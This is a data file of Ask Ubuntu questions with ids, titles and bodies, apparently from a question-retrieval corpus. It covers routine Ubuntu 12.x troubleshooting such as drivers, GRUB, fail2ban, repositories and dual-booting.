270493	how to crop a multi-page ( image/scanned ) pdf file ( which wo n't crop with pdfcrop ) ?	usually , i 'm pretty happy using pdfcrop , even though the cropped output usually consumes significantly more disk space . note that comparable code does exist , which addresses and resolves this issue . however , if wanting to crop a scanned ( image ) pdf file , my impression is that pdfcrop simply fails . i imagine that imagemagick is capable of doing the trick , possibly by ( also ) making us of pdftk . i 'm looking for an efficient one-liner of code ( a multi-line script would also be ok ... ) to crop such a pdf file from top-bottom-left-and-right by x cm each ( or , better yet , by a b c d cm , individually ) , going all the way from input.pdf to output.pdf . ps : the solution need n't involve imagemagick ; i 'm happy as long as it works ( cleanly , reliably and efficiently ) ... ; )
270494	povray - ubuntu 12.04 file not found	i have installed povray on my ubuntu 12.04 lts box by following following fossfreedoms post . it worked fine the first time when i ran the command ~ $ povray +ipovpawn.pov but now i get 0:00:00 parsing possible scene file parser initialization error : could not find file 'povpawn.pov' scene file parser initialization error : can not open input file . total scene processing times parse time : 0 hours 0 minutes 0 seconds ( 0 seconds ) photon time : 0 hours 0 minutes 0 seconds ( 0 seconds ) render time : 0 hours 0 minutes 0 seconds ( 0 seconds ) total time : 0 hours 0 minutes 0 seconds ( 0 seconds ) i tried moving pawn.pov file from /home/me/povray-3.6.1 to /usr/local/share/povray-3.6 and got access denied check povray.conf
270502	how to fix 500 internal server error using authconf in httpd ?	this is a new installation . i used sudo apt-get install libapache2-mod-auth-mysql phpmyadmin if i put the following code in my httpd config file i get a 500 internal server error . any idea why i '' m getting this error ? is something wrong with my directory path or password path ? thii is httpd.conf : < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php # allowoverride authconfig authtype basic authname `` restricted files '' authuserfile /usr/share/password/.htpasswd require valid-user < /directory >
270505	lenovo thinkserver ubuntu 12 server install : partition issues	during the ubuntu 12 install , i get the a screen that says `` ata raid device detected '' and asks if i want to enable it . having used lenovo easy setup to configure the raid ( 1 array with 2 1tb drives ) i chose `` yes '' . it takes me to the partition manager where i can see three options , and a blank line after the first : * configure iscsi * ___________________ * undo partition changes * write changes to disk i have no idea what iscsi is but i 'm pretty sure it 's not for me . undo partition changes just hangs the system at a purple screen . write changes to disk gives me an error stating no root files system is defined . what should i do to get ubuntu installed with the raid ?
270506	no lock screen option for certain user	i seem to have lost the lock screen option for one user of the system . it does not appear in the menu in the top right hand corner ( with log out etc ) and nor does ctrl+alt+l do anything despite being listed in the keyboard shortcuts of my system settings to lock screen . if i go to brightness and lock the lock area is just greyed out . this facility is available to other users on the system so i 'm not quite sure what the problem is . i should note that this particular user is not an admin user and does not have sudo privileges whereas the user is works for does ( just in case that is important ) . i ca n't remember if i perhaps turned this facility off a long time ago for this user , but if so now i do n't seem to be able to get it back . some things i 've tried : removed xscreensaver , re-installed gnome-screensaver ( currently the newest version ) set gsettings set org.gnome.desktop.screensaver lock-enabled true i created a new test user with no admin privileges and for them the lock screen option was available .
270507	how to create virtual nic and associate them with different vlan	i am trying to connect one physical nic to two different vlans by creating virtual nic . since switch tags a port with only single vlan id . if i convert the switch port to trunk mode , is there some way to tag virtual nic packets with certain vlan id ? i just recently started using ubuntu , i will much appreciate if answered in detail : )
270508	how can i install 64 bit mongodb after installing 32 bit	i recently installed mongodb for a project for a data mining class i 'm taking and while loading all the documents i needed i got an error specifying mongodb is out of memory and that i needed to install the 64 bit version to add additional records to the database . problem is , i do n't know how to do that ( or uninstall the 32 bit version.. ) .
270510	why does ubuntu 12.10 not enable my network card ( s ) ?	i 've got some trouble with my setup . fresh installation of ubuntu 12.10 with the latest kernel . ubuntu only enables one of my network cards . i 'm using a asus a8n sli deluxe motherboard , with latest bios . this motherboard has 2 built-in network cards , one marvell ( 88e8001 ) and one nvidia ( ck804 ? ) the nvidia nic is working out-of-the-box , but the marvell nic does not load properly . the module is there ( skge , as i understand it ) but when i type lshw -c network it says *-network:0 unclaimed . i 've tried downloading the latest driver from marvell 's site ( sk98lin ) but that seems to be for a too old kernel ( 2.4 something ) . anyway , i get an error when trying to install it with something about the driver being for the wrong kernel . even when i try a pci 3com 3c905b tx ( with driver 3c59x ) lshw -c network says unclaimed . i 've had 2 3com 3c905b cards installed in this motherboard before , running just fine . my rig is , a soon to be , gateway . been using ipcop before ( with the same 3com nic 's ) lspci shows the cards ( nvidia , marvell and 3com ) lshw -c network shows both marvell and 3com unclaimed lsmod shows the necessary drivers for marvell ( skge ) and 3com ( 3c59x ) ( or modules one might say ? ) update : i 've managed to install sk98lin from marvell 's download section , sudo modprobe sk98lin works fine but dmesg | grep sk98lin says sk98lin : hwinit ( 1 ) failed .
270515	recording software for multiple input devices	does anyone know of any software that will allow me to record from multiple sound cards at once ? i tried audacity but they seem to only support one at a time .
270516	ca n't re-enable ppas long after upgrade to 12.10	i upgraded from 12.04 to 12.10 some time ago . i realize now that many of my ppas were automatically disabled ( as it always happens ) now , the issue is that i ca n't re-enable them , the software sources gui wo n't let me . i can un-check already checked ppas but that 's it . i ca n't neither edit nor remove nor re-enable any of the automatically disabled ppas . for example , ppas for google chrome , dropbox , and wine were disabled upon upgrading . on google chrome this reflects in my system still running version 24.0.1312.52 when the current version of this browser is 25.0.1364.172 ( since march 12th ) how can i fix this ? by request here 's the content of the .list files for dropbox : # deb http : //linux.dropbox.com/ubuntu quantal main # ( desactivado en la actualizaci贸n a quantal ) and google chrome : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . # deb http : //dl.google.com/linux/chrome/deb/ stable main # ( desactivado en la actualizaci贸n a quantal ) fyi : `` desactivado en la actualizaci贸n a quantal '' means `` deactivated during quantal upgrade '' in spanish .
270518	fail2ban or denyhosts to block invalid username login attempts	is there a way to automatically block ip address when a user tries to login as any invalid username ? i already have : [ ssh ] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 3 bantime = 31536000 in /etc/fail2ban/jail.conf
270520	old usb driver on 12.10	i have a usb device that comes with a generic linux driver in the form of a kernel module . it 's a .ko file that i 'm supposed to install . however , it was compiled for version 2.16.18-53 of the linux kernel . i do n't have access to the source . is it possible to get this working on ubuntu 12.10 with linux 3.2.0-39-generic-pae ?
270528	show packages to be upgraded on login	i did an ubuntu server install using preseed . when i log in , it does n't tell me how many packages ( including security packages ) require an upgrade , and when a restart is required . how do i configure it to show me these things on login ?
270529	why did canonical reduce ubuntu 's ( non-lts ) support time to 9 months ?	is reducing support time the first step to having a rolling distribution ? is there any other purpose ?
270531	ubuntu 12.10 freezes on install	i installed ubuntu using wubi installer , and it installed fine . but then i ran into a problem where the top bar and program bar ( the thing on the left side , i do n't know what to call it ) were gone . seeing no way to fix this , i decided to uninstall ubuntu and then reinstall it . the windows portion of the reinstalling process went much faster than it did the first time . when i clicked `` reboot now '' and the computer rebooted , instead of showing the code on the black screen ( like it did the first time ) it took me to a fully rendered ubuntu window that said install at the top . it was taking a while to install , and then at about 3/4 of the way through , when it said `` copying files '' it froze . i could n't even move the mouse . i left it alone for a while , hoping it would unfreeze itself and continue on installing . it sat for over 3 hours without doing anything . the only way to shut down my computer was to hold the power button down until the computer powered off . i waited a few minutes , then turned it back on , and got the option to run windows 7 or ubuntu . i chose ubuntu , and it ran the install thing again , only to freeze in the exact same spot . i am on an hp pavillion dv6 notebook pc , with a quad core , amd a8 3500m apu with radeon hd graphics 1.50 ghz , and 8 gb ram . thanks in advance for your help !
270539	accessing a samba mapped drive from terminal	i have mapped a samba share from the gui ( 12.04 ) of my desktop and it works fine , but i would like to connect to this machine ( the one i mapped from ) via ssh and be able to see the mapped share . however , looking at /dev etc . i do n't see anything like it . it appears in the nautilus display just fine , i can read and write , but only from the gui , not from the terminal display . what am i missing ? i mapped from the gui so it seems i do n't get to specify a mount point .
270540	ubuntu 12.04lts overheating laptop	i have been using elementary os , for quiet along time . its based of ubuntu , and once i got sick of no customization options , i went for ubuntu 12.04 lts . now this overheats my laptop constantly , it takes some time but it get so hot i can smell it and then ( luckly ) shuts down . why is this happening ? when eos was so stable ? ( laptop : acer aspire 7741g , intel i5 , radeon hd5650 )
270542	problems after changing from pcmanfm to nautilus	i have to use lxde because of the age of my system , and i quite like it . but after i changed the default file manager from pcmanfm to nautilus ( via this ) and restarted , i just get a background color and some of the logos ; even then , some of the logos are different than the typical lxde logos . it says lxpanel is running when i run task manager ( ctrl + alt + delete ) and when i try to run it from terminal ( ctrl + alt + t ) it says that it is already running . if i kill lxpanel via terminal and run the command sudo lxpanel it will run , but only as long as the command is running in terminal and even then the logos are weird on the panel too . the original install was done via sudo apt-get install lubuntu-desktop , so hopefully that helps . i had some default lxde programs installed and the lxde de . edit : i simply ran the command sudo apt-get purge lubuntu-desktop and sudo apt-get purge lxde and then reinstalled it via sudo apt-get install lubuntu-desktop and sudo apt-get install lxde* ( i know about the * and what it does , i wanted it that way . ) anyways , it works now and i am using it currently . thanks for the help @ vasa1 .
270543	i am very dizzy ! somebody help me with my ubuntu	this is a pretty long question and is much of my 2 week history . please bare with me and help me out of this . as the question states i am now feeling dizzy after struggling with my ubuntu machine from the last 4 days . i accept that should have posted a question here first , but being a windows user and newbie to linux even to ask questions i lacked some understanding . hence after one good week of struggle with linux and learning few things about it here i come to ask the question . specs linux - installed ubuntu 12.10 ( but says 13.04 in the about menu ) machine - dell pws 450 board - intel chipset graphics card - nvidia quadro fx 1000 ram - 3 gb ddr dual monitors to support stereoscopy ( i work in my university lab , where a machine has been given to me for testing the robotics software using ubuntu ) desktop environment - gnome ( sorry but unity sucks for me ) problems video card problem - login screen , blender and webgl ( not working fine ) though the installation of ubuntu went like a charm but post install it was nothing but a lot of trouble all the while . the first problem i faced was the unity desktop with the login screen blank only with the wallpaper , mouse cursor , volume icon and power icon on the top . the users list was not visible at all . adding to this the desktop was really slow , slow like hell . hence removed unity and installed gnome which is much much better . though randomly my problems arose and got fixed by the million commands on the terminal given by me after reading websites and solutions on askubuntu until i decided to seek the help of experts here to stabilize it once for all . i am a masters student , with a project on robotics . the robotics software requires ubuntu to work . hence switched to ubuntu . also i work on webgl and blender which is also part of my project . when i say blender , the models made by me are fairly simple enough to only test my code but still i need it . though the machine was never performing at its best until yesterday when i installed the nvidia driver downloaded from the nvidia site itself . the link is here . when i ran the .run file it went smooth and i was very glad to even see the nvidia splash screen show up before the login - wow . the login screen worked fine . but to my dismay webgl was not working ( it was never working ) and also blender stopped working ( was working fine all the time ) . at this stage except webgl and blender everything else in the desktop was fine ( login screen fixed , system was uber cool fast with gnome , etc. , ) now i started the troubleshooting process to install webgl and fix the blender problem and eventually ended up screwing up the whole machine . sorry to say but this is the truth . the truth is i had screwed up the video driver again when following the guidelines to fix the webgl and it blasted everything . i again tried to install the downloaded nvidia drivers but they refused to install because somehow my kernel was updated to 3.7 and had the driver now had problems . so degraded it to 3.5 and installed the drivers which was successful . currently the state of my machine is the problems now ( solved the login problem temporarily by editing the /etc/gdm/custom.conf to do autologin ) 1 - login screen - has mouse cursor , wallpaper , icons on the top but the users list is not visible and neither the buttons . and it looks blank . 2 - blender - is now working fine 3 - webgl - is not working neither with chrome or firefox i am glued to this machine from sterday without sleep , have not even gone home to have my food or anything else . my eyes are even refusing to open and to look at things clearly . so thought before i go into the rem mode will post this question so that souls out there can come to my aid . regards , 0k srinivasan .
270544	how can i use stroustrup 's graphics libraries ( simple_window.h , graph.h , ... ) in netbeans	i 'm reading and learning bjarne stroustrup 's `` programming principles and practice using c++ '' . i want to use graphics libraries from chapter 12-16 in netbeans 7.3 . i have already added header files ( simple_window.h , graph.h and others ) and source files ( graph.cpp and others ) . i also installed fltk-1.1.10 and configured it to netbeans . but i ca n't build `` first example '' program in chapter 12 . when i write simple_window and polygon functions , errors occur while compiling . errors are something like this : undefined reference to < some functions or class > the program is like this . # include `` simple_window.h '' # include `` graph.h '' int main ( ) { using namespace graph_lib ; // our graphics facilities are in graph_lib point tl ( 100,100 ) ; // to become top left corner of window simple_window win ( tl,600,400 , '' canvas '' ) ; // make a simple window polygon poly ; // make a shape ( a polygon ) poly.add ( point ( 300,200 ) ) ; // add a point poly.add ( point ( 350,100 ) ) ; // add another point poly.add ( point ( 400,200 ) ) ; // add a third point poly.set_color ( color : :red ) ; // adjust properties of poly win.attach ( poly ) ; // connect poly to the window win.wait_for_button ( ) ; // give control to the display engine }
270550	why does pylint gedit plugin give me an error when i try to enable it ?	i downloaded and installed the pylint gedit plugin . i then copied the pylint.gedit_plugin file and the pylint directory to /usr/lib/gedit/plugins i could n't see it in the gedit plugins menu so i renamed pylint.gedit_plugin to pylint.plugin and changed the first line of the file from [ gedit plugin ] to [ plugin ] now i can see it in the menu . but when i select it , the red circle error icon appears and i can not enable to plugin . what else do i need to do to use the plugin ? any help is appreciated .
270553	ubuntu 12.10 compiz has closed unexpectedly	i 'm new to ubuntu ... ubuntu 12.10 compiz has closed unexpectedly installed on a dell latitude d505 , chipset intel i855gm have seen some post about additional drivers , but not abel to select unity ( 2d ) in the session box ( on the loginscreen ) . if i understand this correct and this is the debugging mode
270554	why when i disabled bluetooth from startup applications does it still run on boot ?	i saw bluetooth in startup applications and disabled it , but the process is still run when i boot the system . edit 1 i disabled it via bum , and still appear in bootchart , look at this https : //docs.google.com/file/d/0bws0_ggz-wudykc5s2p2y1jyynm/edit ? usp=sharing and most of services that i disabled via bum edit 2 i uninstalled it before via ubuntu software center , but reinstalled automatically when update system
270556	how do i change the options that appear in the generated grub 0.97 menu.lst file ?	i 'm working on systems that have 10.04.3 installed as an upgrade from 8.04 . so these systems have grub 0.97 installed . i want to get verbose console output during startup , so i want to eliminate the `` quiet '' option being passed to the kernel by the generated grub menu options . i see there 's a commented option in the /boot/grub/menu.lst file : # # additional options to use with the default boot option , but not with the # # alternatives # # e.g . defoptions=vga=791 resume=/dev/hda5 # defoptions=quiet splash i know edits to the menu.lst would be lost upon the next 'update-grub ' . so where , or what , do i set so that a subsequent 'update-grub ' invocation will build the menu.lst file the way i want ? i have some newer systems ( 10.04 and 12.04 clean installs ) that have an /etc/default/grub file , but my grub 0.97 systems do n't have that file . could i just create it and add grub_cmdline_linux_default= '' '' to get what i want ( no `` quiet '' arg to the kernels ) in menu.lst ?
270561	why wo n't my netbook read by usb drive ?	i have a problem installing ubuntu via usb storage using unetbootin : my notebook bios does not read the usb key , instead of another notebook that i tried that does . i think the problem is that usb ports are not active because if i go in bios settings in the page in which i can set what device is ran first , the bios does not show me the name of the usb drive , instead of the other notebook that does .
270565	where to configure syndaemon settings ?	where do i configure syndaemon default parameters ? by default it is called with -i 2.0 -k -r -t . i have a script that re-runs it with parameters that i need , but how do i do this properly ? i am on ubuntu 12.04
270566	is it normal for multiple processes of gnome-shell to show up in top/htop ?	i 've recently installed and started using htop instead of the system monitor included in default ubuntu installations and i noticed something weird . i arranged htop to display the processes by memory usage and noticed i have 9 instances of gnome-shell running , all with different pid 's . is this normal for gnome ? i never noticed it before on other ubuntu installs , but to be fair i 've never looked either .
270570	is there an ncurses tool for upstart similar to ntsysv or sysv-rc-conf ?	i 'd like to be able to use a terminal or console to configure runlevels . i do n't need the conditions for starting and stopping services to be any more complicated than sysv . i just want to base decisions on the runlevel .
270573	do n't really want a web dev version of ubuntu	i got this version of ubuntu v12.10 desktop ( amd64 ) online , burned it to disc back on 2013-01-30 , and finally got around to installing it alongside windows 7 pro x64 on this box . i have n't even checked to see if it dueal boots as expected ... here 's the problem and it may or may not actually be a problem . this installation booted up as `` ubuntu studio '' and at first glance seems tailored for web developers or other types far more artistically inclined than i am . if `` ubuntu studio '' is meant to be similar to `` visual studio '' in connotation , a programmer 's environment , i can deal with it.. if it is a web developer 's platform it will mean a lot of work deleting crap i do n't want or need and installing a version of 12.10 that actually is loaded with programmer 's tools . what i 'd really like to do is completely uninstall this thing and make sure windows7 pro still boots and performs as it did yesterday , then install a cleaner , more useful-to-me version of ubuntu . so far , i 'm liking the look of the ui of this version of ubuntu ... the last one i used much was v10.4 , i think . anyway , is there a way to , and should i bother to , install a more software development oriented edition of ubuntu on this machine without hosing it in the process ? in my experience , uninstall routines are often disastrously buggy . i do have the option to just wipe the 256gb ssd and restore it from the raid1 virtual drive i use for backup and long-term storage . i 'm hoping someone has a better solution to what may be a non-problem . [ added a few minutes later ... ] i 'm gon na figure out how to keep this desktop 's appearance ... too much orange gets on my nerves , but light grays and blues are easy on tired eyes .
270575	how to find ghostscript files in ubuntu ?	i 'm working with the terminal and im trying to find ghostscript files in all the computer . how can i do that ? i know that i must use the comand `` find '' , but is there anything else i should type ?
270582	how to fix networking after installing a new cpu/motherboard ?	upgraded from an athlonii to an fx-8350 . this meant new motherboard/integrated lan . i ca n't figure out how to configure the new setup to connect to my network . any help appreciated . also , as i obviously do n't have internet , it 's going to be a little tough to get new isntalls onto it . i 'm not entirely familiar with mounting flash drives . there is no cd drive . edit # 1 : now using a ga-990fxa-ud3 motherboard . it has a realtek ethernet , from what i can find . i do n't know which chip exactly . lspci | grep -i eth 04.00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabet ethernet controller ( rev 06 )
270584	access to data via livecd	i have a problem with my ubuntu 12.04 . after one of the updates i could not boot successfully . there was apparently some graphical problem . a message popped up with four options to choose but i could not select anything : pressing the arrow keys or enter had no effect . now , i want to make a fresh install but before that i need to get some of the data on my hard disk . how can i do that ? i tried by using the livecd but i got a message saying i had no permission to access the home folder . i expected that at least i get a chance to enter my password somewhere in order to identify my self , but no . as i was installing ubuntu , i encrypted my home folder ( still have the passphrase ) . may be that is important . does anyone know a way how to get to my data ? perhaps not through the livecd but by somehow booting without a gui , just with a terminal because of the graphics problem . i guess that would be sufficient to copy the data i need on a usb stick .
270589	uninstalling a downloaded theme	i downloaded gnomishdark every since i applied the theme ubuntu 12.10 has n't been the same . i reverted to a pre-loaded theme but i think some of the dependency gnomishdark applied may be the problem . however , whenever i go to uninstall it with sudo apt-get remove gnomishdark i am getting this : e : unable to locate package gnomishdark . if i do cd /usr/share/themes and then ls , the theme is present and listed as gnomishdark . am i doing something wrong ?
270591	ubuntu 12.10 uefi installation with windows 8 acer apsire	i 'm trying to install ubuntu 12.10 on my acer aspire at work . i need to keep the original windows 8 and would like to have ubuntu running alongside it . so far i 've only been able to get the ubuntu live to boot when in legacy mode , which does n't work with my uefi windows 8 . i 've tried disabling and enabling secure boot as well , but it does n't appear to change much . i 've tried using the secure-remix as well , but it does n't appear to recognize the disk ( problem with the iso maybe ? ) . after looking around i 've yet to find anything that helps me get ubuntu running on this machine . i do n't want to install ubuntu in legacy mode for fear of destroying windows 8 . any help would be greatly appreciated .
270593	disk check on booting - 12.10	every time i boot my device it 's running check disk on disk errors . i just correctly shutdown or reboot my device but it still runs check disk every time . sometimes when itĺ done it freezes at a terminal screen with the text `` starting '' but it does nothing . i have to reboot again to make it work . does anyone know a solution for this problem ?
270599	how to use a mct trigger ii external usb2dvie3 adaptor ?	running ubuntu 12.04 lts - relative newbie . would really like to know if i can use the startech usb2dvie3 adapter . i 've done some reading but have n't got very far . it uses displaylink technology ( i think ) but with a different chipset ( mct t2-285b ) to other devices . there 's a suggestion that this later device will be supported in the kernel 3.5 however i 'd really like to hear from anyone who has had success getting this working . thanks !
270600	dead keyboard when entering password	i lost all icon from my desktop . when i use the terminal i am able to enter the commands but the keyboard goes dead when ask for my password . the only key that works is the enter key and after 3 enters it starts over and the keyboard starts to work . help , i 'm new to ubuntu and i really like it but been having problem since i upgraded .
270603	why the sound stopped working ?	my sound suddenly stopped to work today at my ubuntu 12.10 . the ubuntu recognize the recording in settings - > sound - > input i already tried to remove .pulse and .pulse-cookie i tried to reinstall .pulse and ansa via the synaptic when i plugged-in earphones it works there is no mute channel via alsamixer i tried to reboot few times i also try it via ubuntu live ( 12.10 via usb-drive ) - same results is it possible it a hardware problem ? or maybe we can fix it with the geeky style : ) ? thanks
270604	macbook pro 7,1 wo n't shut down without holding power button - 12.10	using the 64 bit desktop version of ubuntu 12.10 , macbook pro 7,1 wo n't shutdown or reboot , it will only go to a blank screen and then hang there forever until the power button is held down for 3 seconds .
270608	e : encountered a section with no package : header	after making index for my local repository , i get this error while updating . e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/_home_soroush_repository_dists_precise_local_binary-amd64_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . then no package manager works . i know that there is a problem with index file generated by dpkg-scan-packages but ca n't find it . i maintain my repo using this script and it worked properly for a long time : # ! /bin/bash for dist in `` precise '' # '' oneiric '' do for component in `` local '' do for architecture in `` amd64 '' # `` i386 '' `` all '' do echo `` generating package index for $ dist $ component $ architecture ... '' dpkg-scanpackages -a $ architecture pool/local /dev/null | gzip -9c > dists/ $ dist/local/binary- $ architecture/packages done echo `` generating source index for $ dist $ component $ architecture ... '' dpkg-scansources pool/local > dists/ $ dist/local/sources/sources done done my question is how can i find which package is causing problem in index file ? there should be some sort of parser for that ...
270613	error trying to install additional drivers	the following packages have unmet dependencies : jockey-kde : depends : jockey-common ( = 0.9.7-0ubuntu11 ) but 0.9.7-0ubuntu11 is to be installed i 'm sorry if it 's stupid but this is my first time running linux
270622	what driver should i choose for my graphics card ?	which one should i select ? preferably without breaking my system . the last time i tried to install drivers , it totally messed up my system and i had to reinstall ubuntu ( which i just finished ) and i would like to try an avoid the same mistake , but i am not sure which one i had installed the last time .
270625	how to fast convert mp4 to webm using ffmpeg ?	sorry to disturb you but i 'm in a kind of a trouble . i have to convert 76 mp4 files to webm for the purpose of a website that uses html5 videos . i 'm talking about 10 gb of mp4 files ... i know i can simply ask ffmpeg to do that using : ffmpeg -i input_file.mp4 output_file.webm of course i 'll do it recursively by : find ./ -name '*.mp4 ' -exec bash -c 'ffmpeg -i `` $ 0 '' `` $ { 0 % % .mp4 } .webm '' ' { } \ ; i even tried something i found somewhere on the internet : ffmpeg -i input_file.mp4 -cpu-used 4 -threads 8 output_file.webm but the thing is that it wo n't take me less than a week ! ! ! what am i doing wrong ? is there any possible way to speed that up ? if i convert to ogg will i gain on speed ? please help ! ! !
270636	integration of archives navigation in nautilus	would there be a tool to integrate the navigation in the content of an archive in nautilus , instead of using archive manager ?
270639	conky display problem showing the horizontal half of info not the full info	i have a strange problem with conky : just the horizontal half of information that is visible on my desktop ( the horizontal half of time and date but the hard disks infos indicated in the config file are not ) like this i use ubuntu 12.10 with gnome-shell desktop can you help me please ? this is my conky config : http : //paste.ubuntu.com/5633979/
270642	`` dead '' shortcuts in installed application lens	i installed some programs using wine , so i could get the hang of how wine works , i then uninstalled the programs , but i now have `` dead '' generic `` toolbox '' icons left in the installed applications lens . based on a previous question , i checked /usr/share/applications , but the generic icons were not there to remove . this is definitely not the end of the world , but it 's really rubbing my ocd the wrong way . i would appreciate any insight very much . thanks .
270644	ca n't install vmware player on ubuntu 12.10 ?	i was attempting to install vmware player through the terminal using these codes : sudo apt-get install build-essential linux-headers-uname -r mkdir ~/vmware & & cd ~/vmware wget -c http : //goo.gl/qgchf -o vmware-player-5.0.1-894247.i386.bundle.tar tar -xvf vmware-player-5.0.1-894247.i386.bundle.tar chmod +x vmware-player-5.0.1-894247.i386.bundle sudo sh vmware-player-5.0.1-894247.i386.bundle i get more than one error : e : unable to locate package linux-headers-uname-r so i tried the second part , just hoping it 'd work . and i get : wget : unable to resolve host address 'vmware-player-5.0.1-894247.i386.bundle.tar' i checked all the commands , all the spelling , all the numbers , everything . went to several different guides and it all says to do the same thing , and i always get the same error . help . please . i need it for my programming class . ; - ; edit : host address http : //goo.gl/qgchf was not found , after fixing the backtick issue . except the .tar was apparently in the directory . tar -xvf did not work . changed it to tar -xf sudo apt-get install build-essential linux-headers-'uname -r ' [ backticks ` instead of ' ] mkdir ~/vmware & & cd ~/vmware wget -c http : //goo.gl/qgchf -o vmware-player-5.0.1-894247.i386.bundle.tar [ host address not found , but .tar was in directory ? ] tar -xf vmware-player-5.0.1-894247.i386.bundle.tar chmod +x vmware-player-5.0.1-894247.i386.bundle sudo sh vmware-player-5.0.1-894247.i386.bundle
270647	dual booting ubuntu with windows 8 on machine with sata ssd cache controller ( dell xps )	system info : dell xps 8500 se with 2tb hd and 32gb ssd sata raid cache i have been at this project for a couple days now and have hit a brick wall on researching the issue . i ca n't find an instance of my configuration online as all of the posts that i 've found are a little bit different than mine and the solutions have n't worked for me . i know exactly what the problem is but i do n't know how to solve the issue on the linux platform . i am very new to linux and need some expert help ! when i bought my machine last october , i had the same issue when setting up a dual-boot for windows 7 and windows 8 . the problem was there was n't any visibility to the drives because the windows installer did n't contain the proper drivers for my sata raid cache . i solved the previous issue by storing the driver , intel ( r ) desktop/workstation/server express chipset sata raid controller , to a usb and loading this driver at the windows 8 install session . how can i load these same drivers at the time of ubuntu install ? i have tried installing both from cd and also the wubi.exe from ubuntu . when installing with wubi.exe , i am presented with the dialog box that asks me to set the install location and create a new user but after the install reboots to complete , i am presented with an error that says no root file system was detected . when installing from the cd , none of my physical drives are present on the partition table list so i am unable to complete the install . if i plug in an external drive it becomes available so i know the issue is with my hard drives not being detected due to the raid controller . to solve the issue with installing from cd , i entered the busy box ( ctrl + alt + f2 ) as soon as the computer rebooted from install so that i can mount the usb with the drivers and copy the .sys files for the drivers to the kernel . i am able to mount and `` cp '' the data just fine , but after returning to ctrl + alt + f1 i do n't know how to continue with the install . i think i may be able to solve the issue if anyone knows how to make the install continue after the drivers have been copied to the kernel . however , as stated , i am new to linux and i am unsure if this is even a valid approach . please give me some insight on how i can re-approach the problem , i am out of ideas . boot repair log
270648	loads of issues with my hp envy-4 sleekbook	i 'm not new to ubuntu but i am knee-deep in problems that i can not find actual solutions for ( even on this site ) , heck im just hoping they exist . i 'm just going to organize this here . system : [ currently ] ubuntu 12.10 ( gnome remix , latest ver . ) graphics > intel® ivybridge mobile x86/mmx/sse2 processor > intel® core™ i5-3317u cpu @ 1.70ghz × 4 my problem ( s ) : overheating fan is constatly running ( sometimes for no reason ) 3 hr . battery life ( sometimes less , just from running chrome ) i love ubuntu , but this sleekbook had a nice install of windows on it ( had coolsense and everything ) but i got a virus that wiped my whole hard drive yada yada i installed ubuntu . intense heating problems . i tried fuduntu and even crunchbang , but still the same issues . i 'll take any advice at this point , literally anything , i just want to be able to type out lecture notes without burning my hands . thank you . also , i 'm aware that there are open source intel drivers ( i installed them many times , nothing worked ) and i realize that there seems to be a buttload of issues with intel ivybridge , even with the lastest ubuntu kernels ... just a solution to my heating problem would make me a very happy person . and if there is another question about this laptop ( even the same family ) anyone feel free to point me in the right direction , ill be on my way , and this question will be gone : )
270653	why is `` saned '' disabled on boot ubuntu 12.04 ?	i want to know why the scanner utility saned is disabled on boot and how to resolve this issue . i have had this problem on 3 laptops and i can not find a solution other than manually restarting the service . here is the error saned disabled edit /etc/default/saned
270658	xserver-xorg-video-intel not installed	i keep receiving a crash report and when i view the details it says xserver-xorg-video-intel not installed . i receive this crash report constantly . 5-10 times in a row . it is very annoying and i need to find a way to stop this . i am using ubuntu 12.04 clean install . if i try to install ( sudo apt-get install xserver-xorg-video-intel ) , it says some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xserver-xorg-video-intel : depends : xorg-video-abi-11 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) e : unable to correct problems , you have held broken packages .
270663	ide similar to pelles c on ubuntu 12.10	i 'm going to school for it and computer engineering , i love ubuntu and i love the ide pelles c but i ca n't seam to find an ide that will do all that pelles c does . now i realize that i may need to piece some stuff together but if someone would point me in the direction of a guide to piece what i need together to make it work or even send me a guide even if it is just terminal commands i would be more than grateful i 'm trying to unteather myself from windows and do n't want to go the osx route either so please and thank you .
270668	is kernel 3.5.0.26 ( 64bit ) intended for 12.10 or 12.04	software updater suggests 3.5.0-26 for my current installation ubuntu 12.10 my system : uname -a linux pfeiffep-hpe-580t 3.5.0-24-generic # 37-ubuntu smp thu feb 7 01:50:30 utc 2013 x86_64 x86_64 x86_64 gnu/linux what i 've found on-line at package search quantal ( kernel ) : generic complete linux kernel . 3.5.0.26.32 [ security ] : amd64 i386 also provided by : type-handling quantal-updates ( kernel ) : generic complete linux kernel . 3.5.0.26.32 : amd64 i386 i 'm relatively new to ubuntu and linux in general and would greatly appreciate some advice on how to make sense of the discrepiencies . update - now this is halting some upgrades from completion . 2013-03-26 14:02:14 remove libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 < none > 2013-03-26 14:02:14 status half-configured libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 2013-03-26 14:02:14 status half-installed libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 2013-03-26 14:02:14 status config-files libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 2013-03-26 14:02:14 status config-files libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 2013-03-26 14:02:14 status config-files libreoffice-emailmerge : all 1:4.0.2~rc1-0ubuntu1~quantal2 2013-03-26 14:02:15 status not-installed libreoffice-emailmerge : all < none > since i 'm perfectly satisfied with kernel 3.5.0-24-generic i took a more assertive action 2013-03-26 14:20:39 startup packages purge 2013-03-26 14:20:39 status installed linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:39 remove linux-image-generic : amd64 3.5.0.26.32 < none > 2013-03-26 14:20:39 status half-configured linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:39 status half-installed linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:39 status config-files linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:39 status config-files linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:39 status config-files linux-image-generic : amd64 3.5.0.26.32 2013-03-26 14:20:40 status not-installed linux-image-generic : amd64 < none > 2013-03-26 14:20:40 status unpacked 